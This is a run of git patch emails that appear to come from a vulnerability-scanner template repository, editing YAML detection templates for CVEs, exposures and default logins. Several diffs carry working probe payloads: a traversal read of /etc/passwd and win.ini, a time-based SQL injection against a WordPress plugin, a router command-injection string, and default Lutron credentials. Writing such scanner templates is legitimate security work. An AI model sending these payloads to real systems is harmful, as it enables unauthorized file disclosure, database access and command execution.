Dhiyaneshwaran Date: Fri, 16 Dec 2022 00:42:12 +0530 Subject: [PATCH 0451/1133] Update unauth-lfd-zhttpd.yaml --- vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index 04680ed0c1..e2f115ef84 100644 --- a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -4,6 +4,8 @@ info: name: Unauthenticated Local File Disclosure in zhttpd author: EvergreenCartoons severity: high + description: | + An endpoint in zhttpd can be used to expose system files including "/etc/passwd" and "/etc/shadow". This endpoint is accessible without prior login. An attacker can read all files on the system by using this endpoint. reference: - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/ - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/ From 04e7a7a7dc20ebea83d710fda172d86ccca8c03e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 01:02:06 +0530 Subject: [PATCH 0452/1133] minor-update --- miscellaneous/sitemap-detect.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml index baaa2e741b..55b1179104 100644 --- a/miscellaneous/sitemap-detect.yaml +++ b/miscellaneous/sitemap-detect.yaml @@ -1,7 +1,7 @@ id: sitemap-detect info: - name: Detect Sitemap + name: Sitemap Detection author: houdinis severity: info description: | @@ -14,15 +14,14 @@ requests: - "{{BaseURL}}/sitemap.xml" - "{{BaseURL}}/sitemap.xsl" - matchers-condition: and host-redirects: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "sitemap" - - "Sitemap" - condition: or + case-insensitive: true + + - type: status + status: + - 200 From 2acf351d4f27048b97bc34a208f8edeb472a8d26 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 01:10:43 +0530 Subject: [PATCH 0453/1133] major-update --- miscellaneous/sitemap-detect.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml index 55b1179104..ced3ce9a39 100644 --- a/miscellaneous/sitemap-detect.yaml +++ b/miscellaneous/sitemap-detect.yaml @@ -6,15 +6,19 @@ info: severity: info description: | A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. - tags: misc,generic + metadata: + verified: "true" + google-query: intext:"sitemap" filetype:txt,filetype:xml inurl:sitemap,inurl:"/sitemap.xsd" ext:xsd + tags: misc,generic,sitemap requests: - method: GET path: - "{{BaseURL}}/sitemap.xml" - "{{BaseURL}}/sitemap.xsl" + - "{{BaseURL}}/sitemap.xsd" - host-redirects: true + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -22,6 +26,11 @@ requests: - "sitemap" case-insensitive: true + - type: word + part: header + words: + - 'application/xml' + - type: status status: - 200 From 3cb432b57f3e50cd4c74ab0aa328ecbea45af6f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 02:12:07 +0530 Subject: [PATCH 0454/1133] windows-path --- cves/2021/CVE-2021-43734.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-43734.yaml b/cves/2021/CVE-2021-43734.yaml index e8347c9cb5..48198c892f 100644 --- a/cves/2021/CVE-2021-43734.yaml +++ b/cves/2021/CVE-2021-43734.yaml @@ -23,12 +23,16 @@ requests: - method: GET path: - "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd" + - "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini" + stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or - type: status status: From 16ad21a7ea453e30a09d36c396844ef64e168d93 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 02:20:22 +0530 Subject: [PATCH 0455/1133] tag added --- cves/2021/CVE-2021-43734.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-43734.yaml b/cves/2021/CVE-2021-43734.yaml index 48198c892f..171404f3ef 100644 --- a/cves/2021/CVE-2021-43734.yaml +++ b/cves/2021/CVE-2021-43734.yaml @@ -17,7 +17,7 @@ info: metadata: shodan-query: http.html:"kkFileView" verified: "true" - tags: cve,cve2021,kkfileview,traversal + tags: cve,cve2021,kkfileview,traversal,lfi requests: - method: GET From e0d87ca98375b81206f5b659053b623e77fad98f Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 15 Dec 2022 17:55:12 -0500 Subject: [PATCH 0456/1133] Update CVE-2020-11110.yaml - Replaced the change-log (dind't have any info regarding CVE-2020-11110) for the pull request to resolve the issue. - Added a HackerOne report using this CVE. --- cves/2020/CVE-2020-11110.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml index 5ee827da43..389723f1bd 100644 --- a/cves/2020/CVE-2020-11110.yaml +++ b/cves/2020/CVE-2020-11110.yaml @@ -7,9 +7,10 @@ info: description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. reference: - https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html - - https://github.com/grafana/grafana/blob/master/CHANGELOG.md + - https://github.com/grafana/grafana/pull/23254 - https://security.netapp.com/advisory/ntap-20200810-0002/ - https://nvd.nist.gov/vuln/detail/CVE-2020-11110 + - https://hackerone.com/reports/1329433 remediation: This issue can be resolved by updating Grafana to the latest version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N @@ -18,7 +19,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: title:"Grafana" - tags: cve,cve2020,xss,grafana + tags: cve,cve2020,xss,grafana,hackerone requests: - raw: From 1611f511333962eb4f2a46d14a9eebb6214f196b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 07:32:28 +0530 Subject: [PATCH 0457/1133] Update CVE-2020-11110.yaml --- cves/2020/CVE-2020-11110.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml index 389723f1bd..d2971ae099 100644 --- a/cves/2020/CVE-2020-11110.yaml +++ b/cves/2020/CVE-2020-11110.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-79 metadata: shodan-query: title:"Grafana" - tags: cve,cve2020,xss,grafana,hackerone + tags: cve,cve2020,xss,grafana requests: - raw: From b96431c2ace073c4514e820a57a9e31fa1f31088 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 07:38:03 +0530 Subject: [PATCH 0458/1133] Update CVE-2022-4050.yaml --- cves/2022/CVE-2022-4050.yaml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml index f18f0c41f9..12ac0b3770 100644 --- a/cves/2022/CVE-2022-4050.yaml +++ b/cves/2022/CVE-2022-4050.yaml @@ -11,28 +11,25 @@ info: - https://wordpress.org/plugins/joomsport-sports-league-results-management/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-4050 - cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,joomsport-sports-league-results-management,unauth + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,joomsport-sports-league-results-management,unauth requests: - raw: - | - @timeout: 10s + @timeout: 15s POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(3))aaaa);--+-"} + mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-"} matchers: - type: dsl dsl: - - 'duration>=3' + - 'duration>=5' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' From 96ada330bd5c7949d4183bc8b7df5f07f6b5b4d3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 07:40:24 +0530 Subject: [PATCH 0459/1133] Update CVE-2018-17422.yaml --- cves/2018/CVE-2018-17422.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-17422.yaml b/cves/2018/CVE-2018-17422.yaml index d1a6a87da4..c2e00f77b6 100644 --- a/cves/2018/CVE-2018-17422.yaml +++ b/cves/2018/CVE-2018-17422.yaml @@ -1,7 +1,7 @@ id: CVE-2018-17422 info: - name: dotCMS <5.0.2 - Open Redirect + name: DotCMS < 5.0.2 - Open Redirect author: 0x_Akoko,daffainfo severity: medium description: | @@ -16,8 +16,8 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 metadata: + verified: true shodan-query: http.title:"dotCMS" - verified: "true" tags: cve,cve2018,redirect,dotcms requests: From f9476a88ba49480f83d6c133682a3ac3fe6a901c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 07:44:07 +0530 Subject: [PATCH 0460/1133] Update lutron-default-login.yaml --- default-logins/lutron/lutron-default-login.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/default-logins/lutron/lutron-default-login.yaml b/default-logins/lutron/lutron-default-login.yaml index a641e5b470..5192be1179 100644 --- a/default-logins/lutron/lutron-default-login.yaml +++ b/default-logins/lutron/lutron-default-login.yaml @@ -7,12 +7,19 @@ info: reference: - https://www.lutron.com - https://vulners.com/openvas/OPENVAS:1361412562310113206 - tags: default-login,iot + tags: default-login,lutron,iot requests: - method: GET path: - - "{{BaseURL}}/login?login=lutron&password=lutron" + - "{{BaseURL}}/login?login={{username}}&password={{password}}" + + attack: pitchfork + payloads: + username: + - lutron + password: + - lutron matchers-condition: and matchers: From 69022e5e23f589b00df65279e26b185518b0940e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:00:29 +0530 Subject: [PATCH 0462/1133] Update vernemq-status-page.yaml --- misconfiguration/vernemq-status-page.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/vernemq-status-page.yaml b/misconfiguration/vernemq-status-page.yaml index 40cea4dbca..fa8daf6149 100644 --- a/misconfiguration/vernemq-status-page.yaml +++ b/misconfiguration/vernemq-status-page.yaml @@ -6,7 +6,7 @@ info: severity: low reference: - https://github.com/vernemq/vernemq - tags: vernemq,misconfig,status + tags: misconfig,vernemq,status requests: - method: GET @@ -18,7 +18,7 @@ requests: - type: word part: body words: - - 'VerneMQ Status' + - 'VerneMQ' - 'Issues' - 'Cluster Overview' - 'Node Status' From 83f4ae44177b9b112cb4af2352c5530497b2f02d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:05:18 +0530 Subject: [PATCH 0463/1133] Update unauth-zwave-mqtt.yaml --- misconfiguration/unauth-zwave-mqtt.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unauth-zwave-mqtt.yaml b/misconfiguration/unauth-zwave-mqtt.yaml index 2f1f6ca9be..d0829b3681 100644 --- a/misconfiguration/unauth-zwave-mqtt.yaml +++ b/misconfiguration/unauth-zwave-mqtt.yaml @@ -9,7 +9,7 @@ info: metadata: verified: "true" shodan-query: title:"ZWave To MQTT" - tags: zwave,mqtt,health + tags: misconfig,zwave,mqtt,unauth requests: - method: GET From 33d282bdb392e905e2c532a21207430d2f745e5b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:08:07 +0530 Subject: [PATCH 0465/1133] Update websheets-config.yaml --- exposures/configs/websheets-config.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/configs/websheets-config.yaml b/exposures/configs/websheets-config.yaml index 348419cabd..5c56d3f69c 100644 --- a/exposures/configs/websheets-config.yaml +++ b/exposures/configs/websheets-config.yaml @@ -6,6 +6,8 @@ info: severity: low reference: - https://github.com/daveagp/websheets + metadata: + verified: true tags: websheets,config,exposure,files requests: From 917b712f9858b97f33d3506267b8a8a0fb94a588 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:09:24 +0530 Subject: [PATCH 0466/1133] Update salesforce-credentials.yaml --- exposures/files/salesforce-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/salesforce-credentials.yaml b/exposures/files/salesforce-credentials.yaml index 30f65b0413..6d0de206ce 100644 --- a/exposures/files/salesforce-credentials.yaml +++ b/exposures/files/salesforce-credentials.yaml @@ -6,7 +6,7 @@ info: severity: unknown reference: - https://github.com/daveagp/websheets - tags: exposure,files,salesforce,disclosure + tags: exposure,files,salesforce requests: - method: GET From 89166203dc58409f31af6f471b2f0f172d05c40a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:12:41 +0530 Subject: [PATCH 0467/1133] Update production-log.yaml --- exposures/logs/production-log.yaml | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/exposures/logs/production-log.yaml b/exposures/logs/production-log.yaml index a850457a1b..73a6b54e46 100644 --- a/exposures/logs/production-log.yaml +++ b/exposures/logs/production-log.yaml @@ -7,7 +7,7 @@ info: metadata: verified: "true" github-query: filename:production.log Connecting to database specified by database.yml - tags: exposure,files,logs,disclosure + tags: exposure,files,logs requests: - method: GET @@ -32,10 +32,3 @@ requests: - type: status status: - 200 - - extractors: - - type: regex - name: last_modified - part: header - regex: - - 'Last-Modified:.*' From 3295892e1a560937b98786559118eaef735ec3c8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:31:24 +0530 Subject: [PATCH 0470/1133] Update credential-exposure.yaml --- file/keys/credential-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml index 26000e60c2..f0702a1c3c 100644 --- a/file/keys/credential-exposure.yaml +++ b/file/keys/credential-exposure.yaml @@ -12,7 +12,7 @@ id: credentials-disclosure-file info: name: Credentials Disclosure Check - author: Sy3Omda,geeknik,forgedhallpass + author: Sy3Omda,geeknik,forgedhallpass,ayadi severity: unknown description: Look for multiple keys/tokens/passwords hidden inside of files. tags: exposure,token,file,disclosure From d6689206691f796cafe4b7925408d6bba1f210c7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:41:31 +0530 Subject: [PATCH 0471/1133] Update unauth-lfd-zhttpd.yaml --- vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index e2f115ef84..99331b2d7a 100644 --- a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -1,7 +1,7 @@ id: unauth-lfd-zhttpd info: - name: Unauthenticated Local File Disclosure in zhttpd + name: zhttpd - Unauthenticated Local File Disclosure author: EvergreenCartoons severity: high description: | @@ -13,7 +13,7 @@ info: metadata: verified: "true" shodan-query: http.html:"VMG1312-B10D" - tags: misconfig,unauth,zyxel + tags: misconfig,unauth,zyxel,lfi requests: - raw: From b531190857957196840c68b6af19aa3e4a73bed0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 08:59:36 +0530 Subject: [PATCH 0472/1133] Update spark-panel.yaml --- exposed-panels/spark-panel.yaml | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/exposed-panels/spark-panel.yaml b/exposed-panels/spark-panel.yaml index c57248d7b6..bc2ebeffc0 100644 --- a/exposed-panels/spark-panel.yaml +++ b/exposed-panels/spark-panel.yaml @@ -1,16 +1,11 @@ id: spark-panel info: - name: SPARK Panel - Detect + name: SPARK Panel Detect author: righettod severity: info - description: SPARK panel was detected reference: - https://www.hypeinnovation.com - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 metadata: verified: true shodan-query: html:"/apps/IMT/Html/" From ffcaa47621ed5d89830454eb3a14f1c7572f71b6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 09:38:40 +0530 Subject: [PATCH 0473/1133] Added Metadata --- cves/2022/CVE-2022-33891.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-33891.yaml b/cves/2022/CVE-2022-33891.yaml index 8570dc7815..ffb2b048f2 100644 --- a/cves/2022/CVE-2022-33891.yaml +++ b/cves/2022/CVE-2022-33891.yaml @@ -8,6 +8,9 @@ info: reference: - https://github.com/W01fh4cker/cve-2022-33891 - https://nvd.nist.gov/vuln/detail/CVE-2022-33891 + metadata: + verified: "true" + shodan-query: title:"Spark Master at" tags: cve,cve2022,apache,spark,authenticated variables: @@ -20,7 +23,6 @@ requests: matchers-condition: and matchers: - - type: word part: body words: From 6f14421d8437e714b688c4424ac2222c3212f30e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 09:43:14 +0530 Subject: [PATCH 0474/1133] formatting-changes --- network/detection/mysql-detect.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index 5ce90b9d47..17dac858a8 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -1,7 +1,7 @@ id: mysql-detect info: - name: Mysql Detection + name: Mysql Detection author: pussycat0x severity: info description: | @@ -12,14 +12,15 @@ info: tags: network,mysql,db network: - - inputs: - data: "\n" + host: - "{{Hostname}}" - "{{Host}}:3306" + matchers: - type: word words: - "mysql" - condition: and \ No newline at end of file + condition: and From 68d079f98ecde493f22c893545bb2469347d9bbf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Dec 2022 06:09:21 +0000 Subject: [PATCH 0475/1133] Auto Generated New Template Addition List [Fri Dec 16 06:09:21 UTC 2022] :robot: --- .new-additions | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/.new-additions b/.new-additions index 29a7f3d958..16323993f7 100644 --- a/.new-additions +++ b/.new-additions @@ -5,8 +5,10 @@ cves/2021/CVE-2021-25099.yaml cves/2022/CVE-2022-0826.yaml cves/2022/CVE-2022-0948.yaml cves/2022/CVE-2022-2314.yaml +cves/2022/CVE-2022-4050.yaml cves/2022/CVE-2022-45917.yaml default-logins/apache/karaf-default-login.yaml +default-logins/lutron/lutron-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml exposed-panels/gyra-master-admin.yaml exposed-panels/ilias-panel.yaml @@ -14,21 +16,29 @@ exposed-panels/mag-dashboard-panel.yaml exposed-panels/microfocus-admin-server.yaml exposed-panels/netris-dashboard-panel.yaml exposed-panels/planet-estream-panel.yaml +exposed-panels/spark-panel.yaml exposed-panels/verizon-router-panel.yaml exposures/configs/config-json.yaml exposures/configs/golangci-config.yaml exposures/configs/stestr-config.yaml +exposures/configs/websheets-config.yaml exposures/files/database-credentials.yaml exposures/files/gradle-libs.yaml exposures/files/kubernetes-etcd-keys.yaml exposures/files/routes-ini.yaml +exposures/files/salesforce-credentials.yaml exposures/files/svn-wc-db.yaml exposures/logs/badarg-log.yaml exposures/logs/firebase-debug-log.yaml exposures/logs/npm-debug-log.yaml +exposures/logs/production-log.yaml iot/homeworks-illumination.yaml +miscellaneous/sitemap-detect.yaml misconfiguration/installer/easyscripts-installer.yaml misconfiguration/installer/metaview-explorer-installer.yaml +misconfiguration/unauth-mautic-upgrade.yaml +misconfiguration/unauth-zwave-mqtt.yaml +misconfiguration/vernemq-status-page.yaml network/detection/cisco-finger-detect.yaml network/detection/finger-detect.yaml network/detection/redis-detect.yaml @@ -36,6 +46,7 @@ network/detection/rpcbind-portmapper-detect.yaml takeovers/leadpages-takeover.yaml technologies/apache/apache-karaf-panel.yaml technologies/icecast-server-detect.yaml +technologies/pagespeed-detect.yaml vulnerabilities/nps/nps-auth-bypass.yaml vulnerabilities/qibocms-file-download.yaml vulnerabilities/vmware/vmware-nsx-stream-rce.yaml From 704b4801aff20091f1403b544aa525cda94ed5ff Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 12:06:40 +0530 Subject: [PATCH 0476/1133] Update CVE-2022-1595.yaml --- cves/2022/CVE-2022-1595.yaml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/cves/2022/CVE-2022-1595.yaml b/cves/2022/CVE-2022-1595.yaml index 896412bb68..266ae72170 100644 --- a/cves/2022/CVE-2022-1595.yaml +++ b/cves/2022/CVE-2022-1595.yaml @@ -1,7 +1,7 @@ id: CVE-2022-1595 info: - name: HC Custom WP-Admin URL <= 1.4 - Unauthenticated Secret URL Disclosure + name: HC Custom WP-Admin URL - 1.4 - Unauthenticated Secret URL Disclosure author: theamanrawat severity: medium description: | @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/hc-custom-wp-admin-url/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1595 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.1 cve-id: CVE-2022-1595 - cwe-id: CWE-200 metadata: verified: "true" - tags: cve,cve2022,wpscan,info-disclosure,wordpress,wp-plugin,hc-custom-wp-admin-url,unauth + tags: cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,unauth requests: - raw: @@ -32,7 +29,9 @@ requests: part: header regex: - "Location: ([a-zA-Z0-9_.\\/-]+)" + - "wordpress" + condition: and - type: status status: - - 302 \ No newline at end of file + - 302 From f147770a28fbf5552afbfa1d1d258d10d7ea9f47 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 13:53:01 +0530 Subject: [PATCH 0477/1133] Update CVE-2021-41773.yaml --- cves/2021/CVE-2021-41773.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index 3dc305a56e..ddf881088d 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -4,7 +4,8 @@ info: name: Apache 2.4.49 - Path Traversal and Remote Code Execution author: daffainfo,666asd severity: high - description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. + description: | + A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. reference: - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 @@ -12,15 +13,14 @@ info: - https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/h4x0r_dz/status/1445401960371429381 - https://github.com/blasty/CVE-2021-41773 - remediation: Update to Apache HTTP Server 2.4.50 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41773 cwe-id: CWE-22 metadata: - shodan-query: apache version:2.4.49 verified: "true" + shodan-query: Apache 2.4.49 tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev variables: @@ -46,7 +46,6 @@ requests: stop-at-first-match: true matchers-condition: or matchers: - - type: regex name: LFI regex: From 5584a179be75384f3247d508b31506e625150ace Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 14:02:27 +0530 Subject: [PATCH 0478/1133] Update exposed-dockerd.yaml --- network/exposed-dockerd.yaml | 13 +++---------- 1 file changed, 3 insertions(+), 10 deletions(-) diff --git a/network/exposed-dockerd.yaml b/network/exposed-dockerd.yaml index 6dc7e906c5..fc9349d68b 100644 --- a/network/exposed-dockerd.yaml +++ b/network/exposed-dockerd.yaml @@ -4,7 +4,8 @@ info: name: Docker Daemon Exposed author: arafat severity: critical - description: Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. + description: | + Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. metadata: verified: true shodan-query: port:2375 product:"docker" @@ -21,12 +22,4 @@ network: matchers: - type: word words: - - "Docker" - - extractors: - - type: regex - regex: - - "Version:([0-9.]+)" - - "Kernel Version:([0-9.]+)" - - "API Version:([0-9.]+)" - - "Container #1:([A-Za-z0-9]+)" + - "Server: Docker" From fe88ffba3d3213c23b50edc54a38fb61ed6f1ff9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 14:48:12 +0530 Subject: [PATCH 0479/1133] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index 86f6c9d801..26c682edd3 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -15,11 +15,14 @@ info: cve-id: CVE-2022-25082 cwe-id: CWE-77 tags: totolink,cve,cve2022,router,unauth,rce,iot + +variables: + cmd: "`ls>../{{randstr}}`" requests: - raw: - | - GET /cgi-bin/downloadFlile.cgi?payload=`ls>../{{randstr}}` HTTP/1.1 + GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1 Host: {{Hostname}} - | From 85d53faee7cb849bebe980e2ee9b7650c42040fb Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 14:50:35 +0530 Subject: [PATCH 0480/1133] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index 26c682edd3..c04cbd40d8 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2022-25082 cwe-id: CWE-77 tags: totolink,cve,cve2022,router,unauth,rce,iot - + variables: cmd: "`ls>../{{randstr}}`" From 8a4b0998f56a979b202fccdaf2f5755804facfc7 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 15:10:17 +0530 Subject: [PATCH 0481/1133] Update CVE-2022-25082.yaml --- cves/2022/CVE-2022-25082.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index c04cbd40d8..18a20c7119 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -14,8 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25082 cwe-id: CWE-77 - tags: totolink,cve,cve2022,router,unauth,rce,iot - + tags: totolink,cve,cve2022,router,unauth,rce,iot variables: cmd: "`ls>../{{randstr}}`" From 7db26abc42353b0f370a03b8800cb4c38d454669 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 16 Dec 2022 15:10:43 +0530 Subject: 